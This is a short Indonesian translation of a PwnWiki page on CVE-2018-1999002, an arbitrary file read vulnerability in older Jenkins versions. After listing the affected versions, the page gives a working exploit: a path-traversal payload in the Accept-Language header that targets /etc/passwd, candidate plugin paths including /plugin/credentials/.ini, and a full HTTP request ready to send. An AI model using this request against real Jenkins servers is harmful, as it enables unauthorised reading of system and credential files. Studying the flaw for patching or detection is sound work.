CVE-2018-1999002 Kerentanan Pembacaan File Sewenang-wenang

From PwnWiki
This page is a translated version of the page CVE-2018-1999002 任意文件讀取漏洞 and the translation is 100% complete.
Other languages:
Bahasa Indonesia • ‎Chinese • ‎中文(中国大陆)‎ • ‎中文(繁體)‎

Versi yang terpengaruh

Jenkins weekly 2.132 dan versi sebelumnya Jenkins LTS 2.121.1 dan versi sebelumnya

Itu dapat membaca file apa pun di server sistem Windows, dan dalam kondisi tertentu, itu juga dapat membaca file di server sistem Linux.

Eksploitasi

Anda harus mengaktifkan izin baca pengguna anonim, tambahkan di header permintaan: 

Accept-Language: /../../../../../../../../etc/passwd

Untuk memproses jalur penyertaan dalam permintaan, seperti /plugin/xxxx, Anda dapat mencoba: 

/plugin/jquery-detached/.xml
/plugin/jquery-detached/.key
/plugin/credentials/.ini

Windows: 

GET /plugin/credentials/.ini HTTP/1.1
Host: x.x.x.x:8080
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.7
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36
Origin: http://x.x.x.x:8080
Referer: http://x.x.x.x:8080/
Accept-Encoding: gzip, deflate
Accept-Language: /../../../../../../../../etc/passwd
Cookie: JSESSIONID.450017e3=x6kdpnkcgllh18wvlaohsqq8z; screenResolution=1920x1080; JSESSIONID.ccf0cd96=node09crp5bs5eglyrv874no3w48l0.node0; JSESSIONID.6551b177=14vcq2nsop6bw1u8urepj65kwv; td_cookie=1608956971
Connection: close
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2018-1999002_任意文件讀取漏洞/id&oldid=3383"